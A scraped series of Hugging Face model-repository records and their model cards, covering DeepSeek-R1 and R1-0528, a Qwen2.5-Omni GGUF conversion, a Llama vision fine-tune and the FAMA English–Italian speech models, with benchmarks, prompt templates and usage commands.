src="https://img.shields.io/badge/🤖%20Chat-DeepSeek%20R1-536af5?color=536af5&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://huggingface.co/deepseek-ai" target="_blank" style="margin: 2px;"> <img alt="Hugging Face" src="https://img.shields.io/badge/%F0%9F%A4%97%20Hugging%20Face-DeepSeek%20AI-ffc107?color=ffc107&logoColor=white" style="display: inline-block; vertical-align: 
middle;"/> </a> </div> <div align="center" style="line-height: 1;"> <a href="https://discord.gg/Tc7c45Zzu5" target="_blank" style="margin: 2px;"> <img alt="Discord" src="https://img.shields.io/badge/Discord-DeepSeek%20AI-7289da?logo=discord&logoColor=white&color=7289da" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://github.com/deepseek-ai/DeepSeek-V2/blob/main/figures/qr.jpeg?raw=true" target="_blank" style="margin: 2px;"> <img alt="Wechat" src="https://img.shields.io/badge/WeChat-DeepSeek%20AI-brightgreen?logo=wechat&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://twitter.com/deepseek_ai" target="_blank" style="margin: 2px;"> <img alt="Twitter Follow" src="https://img.shields.io/badge/Twitter-deepseek_ai-white?logo=x&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> </div> <div align="center" style="line-height: 1;"> <a href="LICENSE" style="margin: 2px;"> <img alt="License" src="https://img.shields.io/badge/License-MIT-f5de53?&color=f5de53" style="display: inline-block; vertical-align: middle;"/> </a> </div> <p align="center"> <a href="https://arxiv.org/pdf/2501.12948"><b>Paper Link</b>👁️</a> </p> ## 1. Introduction The DeepSeek R1 model has undergone a minor version upgrade, with the current version being DeepSeek-R1-0528. In the latest update, DeepSeek R1 has significantly improved its depth of reasoning and inference capabilities by leveraging increased computational resources and introducing algorithmic optimization mechanisms during post-training. The model has demonstrated outstanding performance across various benchmark evaluations, including mathematics, programming, and general logic. Its overall performance is now approaching that of leading models, such as O3 and Gemini 2.5 Pro. <p align="center"> <img width="80%" src="figures/benchmark.png"> </p> Compared to the previous version, the upgraded model shows significant improvements in handling complex reasoning tasks. For instance, in the AIME 2025 test, the model’s accuracy has increased from 70% in the previous version to 87.5% in the current version. This advancement stems from enhanced thinking depth during the reasoning process: in the AIME test set, the previous model used an average of 12K tokens per question, whereas the new version averages 23K tokens per question. Beyond its improved reasoning capabilities, this version also offers a reduced hallucination rate, enhanced support for function calling, and better experience for vibe coding. ## 2. Evaluation Results ### DeepSeek-R1-0528 For all our models, the maximum generation length is set to 64K tokens. For benchmarks requiring sampling, we use a temperature of $0.6$, a top-p value of $0.95$, and generate 16 responses per query to estimate pass@1. <div align="center"> | Category | Benchmark (Metric) | DeepSeek R1 | DeepSeek R1 0528 |----------|----------------------------------|-----------------|---| | General | | | MMLU-Redux (EM) | 92.9 | 93.4 | | MMLU-Pro (EM) | 84.0 | 85.0 | | GPQA-Diamond (Pass@1) | 71.5 | 81.0 | | SimpleQA (Correct) | 30.1 | 27.8 | | FRAMES (Acc.) | 82.5 | 83.0 | | Humanity's Last Exam (Pass@1) | 8.5 | 17.7 | Code | | | LiveCodeBench (2408-2505) (Pass@1) | 63.5 | 73.3 | | Codeforces-Div1 (Rating) | 1530 | 1930 | | SWE Verified (Resolved) | 49.2 | 57.6 | | Aider-Polyglot (Acc.) 
| 53.3 | 71.6 | Math | | | AIME 2024 (Pass@1) | 79.8 | 91.4 | | AIME 2025 (Pass@1) | 70.0 | 87.5 | | HMMT 2025 (Pass@1) | 41.7 | 79.4 | | | CNMO 2024 (Pass@1) | 78.8 | 86.9 | Tools | | | BFCL_v3_MultiTurn (Acc) | - | 37.0 | | | Tau-Bench (Pass@1) | - | 53.5(Airline)/63.9(Retail) </div> Note: We use Agentless framework to evaluate model performance on SWE-Verified. We only evaluate text-only prompts in HLE testsets. GPT-4.1 is employed to act user role in Tau-bench evaluation. ### DeepSeek-R1-0528-Qwen3-8B Meanwhile, we distilled the chain-of-thought from DeepSeek-R1-0528 to post-train Qwen3 8B Base, obtaining DeepSeek-R1-0528-Qwen3-8B. This model achieves state-of-the-art (SOTA) performance among open-source models on the AIME 2024, surpassing Qwen3 8B by +10.0% and matching the performance of Qwen3-235B-thinking. We believe that the chain-of-thought from DeepSeek-R1-0528 will hold significant importance for both academic research on reasoning models and industrial development focused on small-scale models. | | AIME 24 | AIME 25 | HMMT Feb 25 | GPQA Diamond | LiveCodeBench (2408-2505) | |--------------------------------|---------|---------|-------------|--------------|---------------------------| | Qwen3-235B-A22B | 85.7 | 81.5 | 62.5 | 71.1 | 66.5 | | Qwen3-32B | 81.4 | 72.9 | - | 68.4 | - | | Qwen3-8B | 76.0 | 67.3 | - | 62.0 | - | | Phi-4-Reasoning-Plus-14B | 81.3 | 78.0 | 53.6 | 69.3 | - | | Gemini-2.5-Flash-Thinking-0520 | 82.3 | 72.0 | 64.2 | 82.8 | 62.3 | | o3-mini (medium) | 79.6 | 76.7 | 53.3 | 76.8 | 65.9 | | DeepSeek-R1-0528-Qwen3-8B | 86.0 | 76.3 | 61.5 | 61.1 | 60.5 | ## 3. Chat Website & API Platform You can chat with DeepSeek-R1 on DeepSeek's official website: [chat.deepseek.com](https://chat.deepseek.com/sign_in), and switch on the button "DeepThink" We also provide OpenAI-Compatible API at DeepSeek Platform: [platform.deepseek.com](https://platform.deepseek.com/) ## 4. How to Run Locally Please visit [DeepSeek-R1](https://github.com/deepseek-ai/DeepSeek-R1) repository for more information about running DeepSeek-R1-0528 locally. Compared to previous versions of DeepSeek-R1, the usage recommendations for DeepSeek-R1-0528 have the following changes: 1. System prompt is supported now. 2. It is not required to add "\<think\>\n" at the beginning of the output to force the model into thinking pattern. The model architecture of DeepSeek-R1-0528-Qwen3-8B is identical to that of Qwen3-8B, but it shares the same tokenizer configuration as DeepSeek-R1-0528. This model can be run in the same manner as Qwen3-8B, but it is essential to ensure that all configuration files are sourced from our repository rather than the original Qwen3 project. ### System Prompt In the official DeepSeek web/app, we use the same system prompt with a specific date. ``` 该助手为DeepSeek-R1,由深度求索公司创造。 今天是{current date}。 ``` For example, ``` 该助手为DeepSeek-R1,由深度求索公司创造。 今天是2025年5月28日,星期一。 ``` ### Temperature In our web and application environments, the temperature parameter $T_{model}$ is set to 0.6. ### Prompts for File Uploading and Web Search For file uploading, please follow the template to create prompts, where {file_name}, {file_content} and {question} are arguments. ``` file_template = \ """[file name]: {file_name} [file content begin] {file_content} [file content end] {question}""" ``` For Web Search, {search_results}, {cur_date}, and {question} are arguments. 
For Chinese query, we use the prompt: ``` search_answer_zh_template = \ '''# 以下内容是基于用户发送的消息的搜索结果: {search_results} 在我给你的搜索结果中,每个结果都是[webpage X begin]...[webpage X end]格式的,X代表每篇文章的数字索引。请在适当的情况下在句子末尾引用上下文。请按照引用编号[citation:X]的格式在答案中对应部分引用上下文。如果一句话源自多个上下文,请列出所有相关的引用编号,例如[citation:3][citation:5],切记不要将引用集中在最后返回引用编号,而是在答案对应部分列出。 在回答时,请注意以下几点: - 今天是{cur_date}。 - 并非搜索结果的所有内容都与用户的问题密切相关,你需要结合问题,对搜索结果进行甄别、筛选。 - 对于列举类的问题(如列举所有航班信息),尽量将答案控制在10个要点以内,并告诉用户可以查看搜索来源、获得完整信息。优先提供信息完整、最相关的列举项;如非必要,不要主动告诉用户搜索结果未提供的内容。 - 对于创作类的问题(如写论文),请务必在正文的段落中引用对应的参考编号,例如[citation:3][citation:5],不能只在文章末尾引用。你需要解读并概括用户的题目要求,选择合适的格式,充分利用搜索结果并抽取重要信息,生成符合用户要求、极具思想深度、富有创造力与专业性的答案。你的创作篇幅需要尽可能延长,对于每一个要点的论述要推测用户的意图,给出尽可能多角度的回答要点,且务必信息量大、论述详尽。 - 如果回答很长,请尽量结构化、分段落总结。如果需要分点作答,尽量控制在5个点以内,并合并相关的内容。 - 对于客观类的问答,如果问题的答案非常简短,可以适当补充一到两句相关信息,以丰富内容。 - 你需要根据用户要求和回答内容选择合适、美观的回答格式,确保可读性强。 - 你的回答应该综合多个相关网页来回答,不能重复引用一个网页。 - 除非用户要求,否则你回答的语言需要和用户提问的语言保持一致。 # 用户消息为: {question}''' ``` For English query, we use the prompt: ``` search_answer_en_template = \ '''# The following contents are the search results related to the user's message: {search_results} In the search results I provide to you, each result is formatted as [webpage X begin]...[webpage X end], where X represents the numerical index of each article. Please cite the context at the end of the relevant sentence when appropriate. Use the citation format [citation:X] in the corresponding part of your answer. If a sentence is derived from multiple contexts, list all relevant citation numbers, such as [citation:3][citation:5]. Be sure not to cluster all citations at the end; instead, include them in the corresponding parts of the answer. When responding, please keep the following points in mind: - Today is {cur_date}. - Not all content in the search results is closely related to the user's question. You need to evaluate and filter the search results based on the question. - For listing-type questions (e.g., listing all flight information), try to limit the answer to 10 key points and inform the user that they can refer to the search sources for complete information. Prioritize providing the most complete and relevant items in the list. Avoid mentioning content not provided in the search results unless necessary. - For creative tasks (e.g., writing an essay), ensure that references are cited within the body of the text, such as [citation:3][citation:5], rather than only at the end of the text. You need to interpret and summarize the user's requirements, choose an appropriate format, fully utilize the search results, extract key information, and generate an answer that is insightful, creative, and professional. Extend the length of your response as much as possible, addressing each point in detail and from multiple perspectives, ensuring the content is rich and thorough. - If the response is lengthy, structure it well and summarize it in paragraphs. If a point-by-point format is needed, try to limit it to 5 points and merge related content. - For objective Q&A, if the answer is very brief, you may add one or two related sentences to enrich the content. - Choose an appropriate and visually appealing format for your response based on the user's requirements and the content of the answer, ensuring strong readability. - Your answer should synthesize information from multiple relevant webpages and avoid repeatedly citing the same webpage. - Unless the user requests otherwise, your response should be in the same language as the user's question. # The user's message is: {question}''' ```
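Since the card above serves the INT8 checkpoint through vLLM's OpenAI-compatible mode, a minimal client sketch may help; it assumes the `vllm serve` command shown earlier is running on localhost:8000 with the served model name from that command, and it applies the sampling settings the card recommends for thinking mode (everything else, such as the prompt and token limit, is illustrative):

```python
from openai import OpenAI

# Point the OpenAI client at the local vLLM OpenAI-compatible server started above.
# A local vLLM server does not check the API key, so any placeholder string works.
client = OpenAI(base_url="http://localhost:8000/v1", api_key="EMPTY")

response = client.chat.completions.create(
    model="DeepSeek-R1-0528-Qwen3-8B-Int8-W8A16",   # must match --served-model-name
    messages=[{"role": "user", "content": "Explain what W8A16 quantization means."}],
    temperature=0.6,            # recommended for thinking mode; avoid greedy decoding
    top_p=0.95,
    max_tokens=1024,
    extra_body={"top_k": 20, "min_p": 0},  # vLLM-specific sampling parameters
)
print(response.choices[0].message.content)
```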
RiggityWrckd/Qwen2.5-Omni-7B-Q8_0-GGUF
RiggityWrckd
2025-05-30T08:16:20Z
0
0
transformers
[ "transformers", "gguf", "multimodal", "llama-cpp", "gguf-my-repo", "any-to-any", "en", "base_model:Qwen/Qwen2.5-Omni-7B", "base_model:quantized:Qwen/Qwen2.5-Omni-7B", "license:other", "endpoints_compatible", "region:us", "conversational" ]
any-to-any
2025-05-30T08:15:32Z
--- license: other license_name: apache-2.0 license_link: https://huggingface.co/Qwen/Qwen2.5-Omni-7B/blob/main/LICENSE language: - en tags: - multimodal - llama-cpp - gguf-my-repo library_name: transformers pipeline_tag: any-to-any base_model: Qwen/Qwen2.5-Omni-7B --- # RiggityWrckd/Qwen2.5-Omni-7B-Q8_0-GGUF This model was converted to GGUF format from [`Qwen/Qwen2.5-Omni-7B`](https://huggingface.co/Qwen/Qwen2.5-Omni-7B) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space. Refer to the [original model card](https://huggingface.co/Qwen/Qwen2.5-Omni-7B) for more details on the model. ## Use with llama.cpp Install llama.cpp through brew (works on Mac and Linux) ```bash brew install llama.cpp ``` Invoke the llama.cpp server or the CLI. ### CLI: ```bash llama-cli --hf-repo RiggityWrckd/Qwen2.5-Omni-7B-Q8_0-GGUF --hf-file qwen2.5-omni-7b-q8_0.gguf -p "The meaning to life and the universe is" ``` ### Server: ```bash llama-server --hf-repo RiggityWrckd/Qwen2.5-Omni-7B-Q8_0-GGUF --hf-file qwen2.5-omni-7b-q8_0.gguf -c 2048 ``` Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well. Step 1: Clone llama.cpp from GitHub. ``` git clone https://github.com/ggerganov/llama.cpp ``` Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux). ``` cd llama.cpp && LLAMA_CURL=1 make ``` Step 3: Run inference through the main binary. ``` ./llama-cli --hf-repo RiggityWrckd/Qwen2.5-Omni-7B-Q8_0-GGUF --hf-file qwen2.5-omni-7b-q8_0.gguf -p "The meaning to life and the universe is" ``` or ``` ./llama-server --hf-repo RiggityWrckd/Qwen2.5-Omni-7B-Q8_0-GGUF --hf-file qwen2.5-omni-7b-q8_0.gguf -c 2048 ```
RoyRoyRpy/test_fine-tuned-visionllama_100_epo1
RoyRoyRpy
2025-05-30T08:14:34Z
0
0
peft
[ "peft", "tensorboard", "safetensors", "trl", "sft", "generated_from_trainer", "base_model:meta-llama/Llama-3.2-11B-Vision-Instruct", "base_model:adapter:meta-llama/Llama-3.2-11B-Vision-Instruct", "license:llama3.2", "region:us" ]
null
2025-05-30T08:14:08Z
--- library_name: peft license: llama3.2 base_model: meta-llama/Llama-3.2-11B-Vision-Instruct tags: - trl - sft - generated_from_trainer model-index: - name: test_fine-tuned-visionllama_100_epo1 results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # test_fine-tuned-visionllama_100_epo1 This model is a fine-tuned version of [meta-llama/Llama-3.2-11B-Vision-Instruct](https://huggingface.co/meta-llama/Llama-3.2-11B-Vision-Instruct) on an unknown dataset. ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 0.0002 - train_batch_size: 10 - eval_batch_size: 8 - seed: 42 - gradient_accumulation_steps: 8 - total_train_batch_size: 80 - optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08 - lr_scheduler_type: constant - lr_scheduler_warmup_ratio: 0.03 - num_epochs: 1 ### Training results ### Framework versions - PEFT 0.13.0 - Transformers 4.45.1 - Pytorch 2.4.0+cu121 - Datasets 3.0.1 - Tokenizers 0.20.3
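The card above records the training setup but leaves the usage section empty; a minimal sketch of attaching this PEFT adapter to its base vision-language model could look like the following (the adapter id comes from the card header, while the test image URL, prompt and generation length are placeholders):

```python
import requests
import torch
from PIL import Image
from peft import PeftModel
from transformers import AutoProcessor, MllamaForConditionalGeneration

base_id = "meta-llama/Llama-3.2-11B-Vision-Instruct"
adapter_id = "RoyRoyRpy/test_fine-tuned-visionllama_100_epo1"

# Load the base model, then attach the LoRA adapter trained in this repo.
model = MllamaForConditionalGeneration.from_pretrained(
    base_id, torch_dtype=torch.bfloat16, device_map="auto"
)
model = PeftModel.from_pretrained(model, adapter_id)
processor = AutoProcessor.from_pretrained(base_id)

# Any test image works; this URL is only a placeholder.
url = "http://images.cocodataset.org/val2017/000000039769.jpg"
image = Image.open(requests.get(url, stream=True).raw)

messages = [{"role": "user", "content": [
    {"type": "image"},
    {"type": "text", "text": "Describe this image."},
]}]
prompt = processor.apply_chat_template(messages, add_generation_prompt=True)
inputs = processor(images=image, text=prompt, return_tensors="pt").to(model.device)

output = model.generate(**inputs, max_new_tokens=128)
print(processor.decode(output[0], skip_special_tokens=True))
```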
FBK-MT/fama-medium
FBK-MT
2025-05-30T08:14:10Z
5
1
null
[ "safetensors", "conformer_encoder_decoder", "speech", "speech recognition", "speech translation", "ASR", "ST", "custom_code", "en", "it", "dataset:FBK-MT/mosel", "dataset:facebook/covost2", "dataset:openslr/librispeech_asr", "dataset:facebook/voxpopuli", "arxiv:2505.22759", "license:cc-by-4.0", "region:us" ]
null
2025-03-31T17:01:17Z
--- license: cc-by-4.0 language: - en - it datasets: - FBK-MT/mosel - facebook/covost2 - openslr/librispeech_asr - facebook/voxpopuli metrics: - comet - wer tags: - speech - speech recognition - speech translation - ASR - ST --- # FAMA-medium <div> <img src="FAMA.png" width="100%" alt="FAMA" /> </div> ## Table of Contents 1. [Overview](#overview) 2. [Usage](#Usage) 3. [Results](#Results) 4. [License](#license) 5. [Citation](#citation) ## Overview FAMA is the first family of large-scale open-science SFMs for English and Italian trained on [over 150k hours of exclusively open-source(OS)-compliant speech data](https://huggingface.co/datasets/FBK-MT/fama-data). FAMA models achieve [remarkable results](#results), with ASR and ST improvements on average across languages compared to OWSM, and is competitive in terms of ASR performance with the Whisper model family while being up to 8 times faster. All the artifacts used for realizing FAMA models, including codebase, datasets, and models themself are [released under OS-compliant licenses](#license), promoting a more responsible creation of models in our community. It is available in 2 sizes, with 2 variants for ASR only: - [FAMA-small](https://huggingface.co/FBK-MT/fama-small) - 475 million parameters - [FAMA-medium](https://huggingface.co/FBK-MT/fama-medium) - 878 million parameters - [FAMA-small-asr](https://huggingface.co/FBK-MT/fama-small-asr) - 475 million parameters - [FAMA-medium-asr](https://huggingface.co/FBK-MT/fama-medium-asr) - 878 million parameters For more information about FAMA, please check our [blog post](https://huggingface.co/blog/FAMA/release) and the [arXiv](https://arxiv.org/abs/2505.22759) preprint. ## Usage FAMA models are supported in Hugging Face 🤗 Transformers. To run the model, first install the Transformers and Datasets libraries. ```sh pip install transformers==4.48.1 datasets ``` To perform a single inference on a sample audio file using the [`pipeline`](https://huggingface.co/docs/transformers/main_classes/pipelines#transformers.AutomaticSpeechRecognitionPipeline) class, run: ```python import torch from transformers import AutoProcessor, pipeline from datasets import load_dataset model_id = "FBK-MT/fama-medium" processor = AutoProcessor.from_pretrained(model_id) device = "cuda:0" if torch.cuda.is_available() else "cpu" tgt_lang = "en" # Force the model to start with the language tag lang_tag = "<lang:{}>".format(tgt_lang) lang_tag_id = processor.tokenizer.convert_tokens_to_ids(lang_tag) generate_kwargs = {"num_beams": 5, "no_repeat_ngram_size": 5, "forced_bos_token_id": lang_tag_id} pipe = pipeline( "automatic-speech-recognition", model=model_id, trust_remote_code=True, torch_dtype=torch.float32, device=device, return_timestamps=False, generate_kwargs=generate_kwargs ) dataset = load_dataset("distil-whisper/librispeech_asr_dummy", "clean", split="validation") sample = dataset[0]["audio"] result = pipe(sample) print(result["text"]) ``` Where `tgt_lang` is the target language (either `en` or `it`). The source languages has not to be specified. To run the inference on a local audio file `audio.wav`, call the pipeline with: ```python result = pipe("audio.wav") ``` To perform a batch inference with size `batch_size`, run: ```python result = pipe(["audio_1.wav", "audio_2.wav"], batch_size=2) ``` For the inference, we suggest converting the audio files in wav format with 16kHz sampling rate and 1 channel. 
## Results We evaluate FAMA on ASR and ST tasks using popular open-source datasets such as CommonVoice, Multilingual LibriSpeech (MLS), VoxPopuli, CoVoST2 and FLEURS. The metrics used are WER (↓) for ASR, and COMET (↑) for ST. We also benchmark FAMA in terms of computational time and maximum batch size supported on HuggingFace against Whisper and SeamlessM4T models. The metric used is the inverse real time factor (xRTF). **Key highlights:** - FAMA achieves up to 4.2 WER and 0.152 COMET improvement on average across languages compared to OWSM v3.1 - FAMA is up to 8 times faster than Whisper large-v3 while achieving comparable ASR performance ### Automatic Speech Recogniton (ASR) | ***Model/Dataset WER (↓)*** | **CommonVoice**-*en* | **CommonVoice**-*it* | **MLS**-*en* | **MLS**-*it* | **VoxPopuli**-*en* | **VoxPopuli**-*it* | **AVG**-*en* | **AVG**-*it* | |-----------------------------------------|---------|---------|---------|---------|---------|----------|---------|----------| | Whisper *medium* | 14.5 | 10.4 | 14.2 | 15.9 | 8.1 | 26.8 | 12.3 | 17.7 | | Whisper *large-v3* | 11.2 | 6.5 | **5.0** | 8.8 | 7.1 | 18.8 | 7.8 | 11.4 | | OWSM v3.1 *medium* | 11.9 | 12.5 | 6.6 | 19.3 | 8.4 | 24.0 | 9.0 | 18.6 | | SeamlessM4T *medium* | 10.7 | 7.8 | 8.8 | 11.3 | 10.2 | 18.2 | 9.9 | 12.4 | | SeamlessM4T *v2-large* | **7.7** | **5.0** | 6.4 | **8.5** | **6.9** | 16.6 | **7.0** | **10.0** | | FAMA-ASR *small* | 13.8 | 8.9 | 5.8 | 12.6 | 7.2 | 15.7 | 8.9 | 12.4 | | FAMA-ASR *medium* | 11.7 | 7.1 | 5.1 | 12.2 | 7.0 | 15.9 | 7.9 | 11.7 | | FAMA *small* | 13.7 | 8.6 | 5.8 | 12.8 | 7.3 | **15.6** | 8.9 | 12.3 | | FAMA *medium* | 11.5 | 7.0 | 5.2 | 13.9 | 7.2 | 15.9 | 8.0 | 12.3 | ### Speech Translation (ST) | ***Model/Dataset WER (↓)*** | **CoVoST2**-*it→en* | **FLEURS**-*en→it* | |-----------------------------------------|---------------------|--------------------| | Whisper *medium* | 0.801 | - | | Whisper *large-v3* | 0.825 | - | | OWSM v3.1 *medium* | 0.636 | 0.337 | | SeamlessM4T *medium* | 0.831 | 0.820 | | SeamlessM4T *v2-large* | **0.852** | **0.855** | | FAMA *small* | 0.774 | 0.807 | | FAMA *medium* | 0.787 | 0.821 | ### Computational Time and Maximum Batch Size | ***Model*** | ***Batch Size*** | ***xRTF en (↑)*** | ***xRTF it (↑)*** | ***xRTF AVG (↑)*** | |------------------------|------------|-------------|-------------|--------------| | Whisper *medium* | 8 | 13.3 | 10.9 | 12.1 | | Whisper *large-v3* | 4 | 7.9 | 6.5 | 7.2 | | SeamlessM4T *medium* | 2 | 28.5 | 26.2 | 27.4 | | SeamlessM4T *v2-large* | 2 | 13.7 | 13.3 | 13.5 | | FAMA *small* | 16 | **57.4** | **56.0** | **56.7** | | FAMA *medium* | 8 | 39.5 | 41.2 | 40.4 | ## License We release the FAMA model weights, and training data under the CC-BY 4.0 license. The training data can be found in [FAMA Training Data](https://huggingface.co/datasets/FBK-MT/fama-data). The [original FBK-fairseq codebase](https://github.com/hlt-mt/FBK-fairseq) used to train the model is released under the Apache 2.0 license. ## Citation If you use FAMA in your work, please cite: ``` @misc{papi2025fama, title={FAMA: The First Large-Scale Open-Science Speech Foundation Model for English and Italian}, author={Sara Papi and Marco Gaido and Luisa Bentivogli and Alessio Brutti and Mauro Cettolo and Roberto Gretter and Marco Matassoni and Mohamed Nabih and Matteo Negri}, year={2025} } ```
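For readers unfamiliar with the speed metric used in the computational-time table above, the inverse real-time factor is simply audio duration divided by wall-clock processing time; a tiny sketch (with illustrative durations) of how such a number is obtained:

```python
# Inverse real-time factor: seconds of audio processed per second of wall-clock time.
def inverse_rtf(audio_seconds: float, processing_seconds: float) -> float:
    return audio_seconds / processing_seconds

# e.g. one hour of audio transcribed in 63 s of compute gives an xRTF of roughly 57,
# i.e. about 57 times faster than real time.
print(inverse_rtf(3600.0, 63.0))
```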
growwgm/VBNG
growwgm
2025-05-30T08:13:31Z
0
0
null
[ "license:bigscience-bloom-rail-1.0", "region:us" ]
null
2025-05-30T08:13:31Z
--- license: bigscience-bloom-rail-1.0 ---
Jackmin108/qwen-7b-rl-step-32
Jackmin108
2025-05-30T08:13:24Z
0
0
transformers
[ "transformers", "safetensors", "qwen2", "text-generation", "conversational", "arxiv:2501.12948", "license:mit", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-05-30T05:04:09Z
--- license: mit library_name: transformers --- # DeepSeek-R1 <!-- markdownlint-disable first-line-h1 --> <!-- markdownlint-disable html --> <!-- markdownlint-disable no-duplicate-header --> <div align="center"> <img src="https://github.com/deepseek-ai/DeepSeek-V2/blob/main/figures/logo.svg?raw=true" width="60%" alt="DeepSeek-V3" /> </div> <hr> <div align="center" style="line-height: 1;"> <a href="https://www.deepseek.com/" target="_blank" style="margin: 2px;"> <img alt="Homepage" src="https://github.com/deepseek-ai/DeepSeek-V2/blob/main/figures/badge.svg?raw=true" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://chat.deepseek.com/" target="_blank" style="margin: 2px;"> <img alt="Chat" src="https://img.shields.io/badge/🤖%20Chat-DeepSeek%20R1-536af5?color=536af5&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://huggingface.co/deepseek-ai" target="_blank" style="margin: 2px;"> <img alt="Hugging Face" src="https://img.shields.io/badge/%F0%9F%A4%97%20Hugging%20Face-DeepSeek%20AI-ffc107?color=ffc107&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> </div> <div align="center" style="line-height: 1;"> <a href="https://discord.gg/Tc7c45Zzu5" target="_blank" style="margin: 2px;"> <img alt="Discord" src="https://img.shields.io/badge/Discord-DeepSeek%20AI-7289da?logo=discord&logoColor=white&color=7289da" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://github.com/deepseek-ai/DeepSeek-V2/blob/main/figures/qr.jpeg?raw=true" target="_blank" style="margin: 2px;"> <img alt="Wechat" src="https://img.shields.io/badge/WeChat-DeepSeek%20AI-brightgreen?logo=wechat&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://twitter.com/deepseek_ai" target="_blank" style="margin: 2px;"> <img alt="Twitter Follow" src="https://img.shields.io/badge/Twitter-deepseek_ai-white?logo=x&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> </div> <div align="center" style="line-height: 1;"> <a href="https://github.com/deepseek-ai/DeepSeek-R1/blob/main/LICENSE" style="margin: 2px;"> <img alt="License" src="https://img.shields.io/badge/License-MIT-f5de53?&color=f5de53" style="display: inline-block; vertical-align: middle;"/> </a> </div> <p align="center"> <a href="https://github.com/deepseek-ai/DeepSeek-R1/blob/main/DeepSeek_R1.pdf"><b>Paper Link</b>👁️</a> </p> ## 1. Introduction We introduce our first-generation reasoning models, DeepSeek-R1-Zero and DeepSeek-R1. DeepSeek-R1-Zero, a model trained via large-scale reinforcement learning (RL) without supervised fine-tuning (SFT) as a preliminary step, demonstrated remarkable performance on reasoning. With RL, DeepSeek-R1-Zero naturally emerged with numerous powerful and interesting reasoning behaviors. However, DeepSeek-R1-Zero encounters challenges such as endless repetition, poor readability, and language mixing. To address these issues and further enhance reasoning performance, we introduce DeepSeek-R1, which incorporates cold-start data before RL. DeepSeek-R1 achieves performance comparable to OpenAI-o1 across math, code, and reasoning tasks. To support the research community, we have open-sourced DeepSeek-R1-Zero, DeepSeek-R1, and six dense models distilled from DeepSeek-R1 based on Llama and Qwen. DeepSeek-R1-Distill-Qwen-32B outperforms OpenAI-o1-mini across various benchmarks, achieving new state-of-the-art results for dense models. 
**NOTE: Before running DeepSeek-R1 series models locally, we kindly recommend reviewing the [Usage Recommendation](#usage-recommendations) section.** <p align="center"> <img width="80%" src="figures/benchmark.jpg"> </p> ## 2. Model Summary --- **Post-Training: Large-Scale Reinforcement Learning on the Base Model** - We directly apply reinforcement learning (RL) to the base model without relying on supervised fine-tuning (SFT) as a preliminary step. This approach allows the model to explore chain-of-thought (CoT) for solving complex problems, resulting in the development of DeepSeek-R1-Zero. DeepSeek-R1-Zero demonstrates capabilities such as self-verification, reflection, and generating long CoTs, marking a significant milestone for the research community. Notably, it is the first open research to validate that reasoning capabilities of LLMs can be incentivized purely through RL, without the need for SFT. This breakthrough paves the way for future advancements in this area. - We introduce our pipeline to develop DeepSeek-R1. The pipeline incorporates two RL stages aimed at discovering improved reasoning patterns and aligning with human preferences, as well as two SFT stages that serve as the seed for the model's reasoning and non-reasoning capabilities. We believe the pipeline will benefit the industry by creating better models. --- **Distillation: Smaller Models Can Be Powerful Too** - We demonstrate that the reasoning patterns of larger models can be distilled into smaller models, resulting in better performance compared to the reasoning patterns discovered through RL on small models. The open source DeepSeek-R1, as well as its API, will benefit the research community to distill better smaller models in the future. - Using the reasoning data generated by DeepSeek-R1, we fine-tuned several dense models that are widely used in the research community. The evaluation results demonstrate that the distilled smaller dense models perform exceptionally well on benchmarks. We open-source distilled 1.5B, 7B, 8B, 14B, 32B, and 70B checkpoints based on Qwen2.5 and Llama3 series to the community. ## 3. Model Downloads ### DeepSeek-R1 Models <div align="center"> | **Model** | **#Total Params** | **#Activated Params** | **Context Length** | **Download** | | :------------: | :------------: | :------------: | :------------: | :------------: | | DeepSeek-R1-Zero | 671B | 37B | 128K | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Zero) | | DeepSeek-R1 | 671B | 37B | 128K | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1) | </div> DeepSeek-R1-Zero & DeepSeek-R1 are trained based on DeepSeek-V3-Base. For more details regarding the model architecture, please refer to [DeepSeek-V3](https://github.com/deepseek-ai/DeepSeek-V3) repository. 
